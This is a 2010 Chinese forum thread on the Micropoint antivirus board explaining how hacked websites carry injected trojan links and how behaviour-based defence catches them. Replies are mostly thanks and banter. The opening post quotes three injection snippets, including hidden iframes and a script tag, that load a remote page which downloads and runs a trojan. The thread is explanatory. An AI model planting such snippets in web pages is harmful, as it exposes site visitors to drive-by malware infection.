标题: 浅谈微点主动防御软件防网页被挂木马功能（值得一看） [打印本页]

---

作者: hanker     时间: 2010-1-18 10:01    标题: 浅谈微点主动防御软件防网页被挂木马功能（值得一看）

其实这篇文章我早就想写了，一直没激情写，也是有一堆乱七八糟的杂事烦心，今天就给大家浅谈下微点主动防御防网页被挂木马功能。

我感觉我说这个还是有点权威的，为啥啊，因为咱测过啊...;)

现在微点主动防御已经加了网页拦截木马的功能，（其实早就加了，有小半年了吧？）先说现在的，浏览网页，网页如果有恶意脚本（就是那段该死的木马网页连接）试图对浏览器进行溢出的时候微点就会报警拦截，所以有很多人测试，为啥我网页有网页木马微点为啥不报警？那是因为是有那段网马的地址，但是真正的网马所在服务器不在线了，或者重启中，这时候微点是不报警的。因为那段地址只是存在，但是没有任何意义。

说到这先给大家说下网页被挂的木马到底是啥。

网页被挂木马有两部分，一部分在我们正常浏览的网页上(比如： www.163.com)正常的网站是没有木马的，不能自己打自己嘴巴，那是被黑客入侵，插了一句恶意脚本，通常是

1）<iframe src=”http://111.tmkkk.com/muma.htm” width=0 height=0></iframe>

2）<script src=http://111.tmkkk.com/muma.js language=javascript></script>

3）top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://111.tmkkk.com/muma.htm "></iframe>'

以上是常见的，可能有的朋友看不明白，我简单说下，比如说163.com网站被挂马，用的是<iframe src=”http://111.tmkkk.com/muma.htm” width=0 height=0></iframe>  ，真正的网马所在地址是http://111.tmkkk.com/muma.htm，不在163的服务器上，因为163的服务器有杀毒软件，检测到就自动删除了，所以黑客一般都自己有空间，放在自己的空间。如果赶上黑客所租服务器重启，或者宕机，这个时候浏览163的网站是安全的，只是有个恶意链接，但对系统没有任何作用，所以微点可能是不报警的。很多人大喧说微点拦截网马没用，不是没用，是他不懂。

<iframe src=”http://111.tmkkk.com/muma.htm” width=0 height=0></iframe>是个0窗口，你看不到，一闪而过，那个所存在网页还有个exe文件，是个木马，muma.htm 的脚本大意是自动下载并自动执行木马。

再说微点主动防御之前是如何拦截网页木马的，通过上面已经找到木马是能够自动下载自动执行木马了，微点是靠行为来判断病毒的，所以自动下载木马，微点主动防御不报警，自动执行微点就报警了，有的网马做的比较失败，下载下来了，但是没有被执行，这微点也不会报警。

简单说下啥是网页被挂木马，网上有很多说的都是错的，什么是网页木马，网页木马是webshell，我们常见的网页被挂了木马，到现在还没个通俗的叫法，呵呵。

通过上面我想大家基本对网页被挂木马和微点主动防御软件如何做都的，应该有了解了，希望大家能挑刺拍砖。

可能有错别字，因为拼音打的，有不明白的，请大家后面跟帖说下，偶慢慢解释。


一定要挑刺拍砖啊！！！:mad::mad::mad:

---

作者: hanker     时间: 2010-1-18 10:02
我看了
http://bbs.micropoint.com.cn/showthread.asp?tid=64622

这个贴之后再也忍不住了，发了此贴

---

作者: jackybaby     时间: 2010-1-18 11:00
嗯，这下明白透彻了。 其实换个浏览器省很多事，或者加条IE为基本用户的组策略也很省事。

---

作者: lsj301     时间: 2010-1-18 11:06
学习了。

---

作者: tustin     时间: 2010-1-18 12:10
来接受h版的教导

---

作者: jaber     时间: 2010-1-18 12:42
;)  H版好同志啊  偶给你加亮咯！

学习的好文章啊！

---

作者: hanker     时间: 2010-1-18 15:32
呵呵，谢谢啦。
今天比较冷，烧锅炉用煤量大，上面领导喊着不是太热，我擦，逼急了我热的他们不敢出门....
累死我了

---

作者: hds_ss     时间: 2010-1-18 16:06
明白了，谢谢！

---

作者: 微点专家     时间: 2010-1-18 18:12
5、6楼马屁精

---

作者: 微点专家     时间: 2010-1-18 18:13
对楼主的敬仰有如滔滔江水连绵不绝，实在是我等学习的榜样

---

作者: f8312519     时间: 2010-1-18 19:44
通过上面我想大家基本对网页被挂木马和微点主动防御软件如何做都的，应该有了解了，希望大家能挑刺拍砖。

应该是微点主防御软件是如何做到防挂马的

---

作者: sogou     时间: 2010-1-19 01:25
学东西了，谢谢

---

作者: jinnii     时间: 2010-1-19 09:13
感谢分享 明白一些了 看到10楼 这哥们太强了 第一次见到被禁言的版主~

---

作者: f8312519     时间: 2010-1-19 19:20
版主也被禁言了
确实悲哀
要不就是号被别人盗了

---

作者: 微点专家     时间: 2010-1-19 22:59
:lol: 那只是幻觉

---

作者: qidao15     时间: 2010-1-20 20:24
……还能学到知识 不错

---

作者: simonfour     时间: 2010-1-26 01:10

Quote:

Originally posted by hanker at 2010-1-18 15:32: 呵呵，谢谢啦。 今天比较冷，烧锅炉用煤量大，上面领导喊着不是太热，我擦，逼急了我热的他们不敢出门.... 累死我了

逼急了热的他们不得不出门!!!;)

---

作者: magicface     时间: 2010-1-26 06:53
10楼那位还说5、6楼马屁精，你比他们拍的响。要我说防网马最好的方式还是能在下载之前就诊断出来，直接阻止下载，类似金山网盾那样的工具就挺好，其实这种工具也没什么技术含量，微点也该试着在软件里融入这种功能，毕竟网络才是安全威胁的第一大来源，微点的防御应该更立体。

---

作者: xlht123     时间: 2010-1-26 09:11

Quote:

Originally posted by 微点专家 at 2010-1-18 18:13: 对楼主的敬仰有如滔滔江水连绵不绝，实在是我等学习的榜样

被“禁言”的这位版主挺“函黑”的嘛！:lol:

---

作者: zhaozhen007     时间: 2010-1-26 16:32
谢谢楼主......

---

作者: 镜湖YES     时间: 2010-1-26 16:38

Quote:

Originally posted by magicface at 2010-1-26 06:53: 10楼那位还说5、6楼马屁精，你比他们拍的响。要我说防网马最好的方式还是能在下载之前就诊断出来，直接阻止下载，类似金山网盾那样的工具就挺好，其实这种工具也没什么技术含量，微点也该试着在软件里融入这种功能 ...

兄弟，你换个浏览器不是更好。

---

作者: magicface     时间: 2010-1-26 16:41

Quote:

Originally posted by 镜湖YES at 2010-1-26 16:38: 兄弟，你换个浏览器不是更好。

为什么要换个浏览器？不过我也确实换过，但由于我经常用网银，非常频繁的用，非IE内核的浏览器对网银不支持，至少是对我用的建行网银不支持，没办法。

---

欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn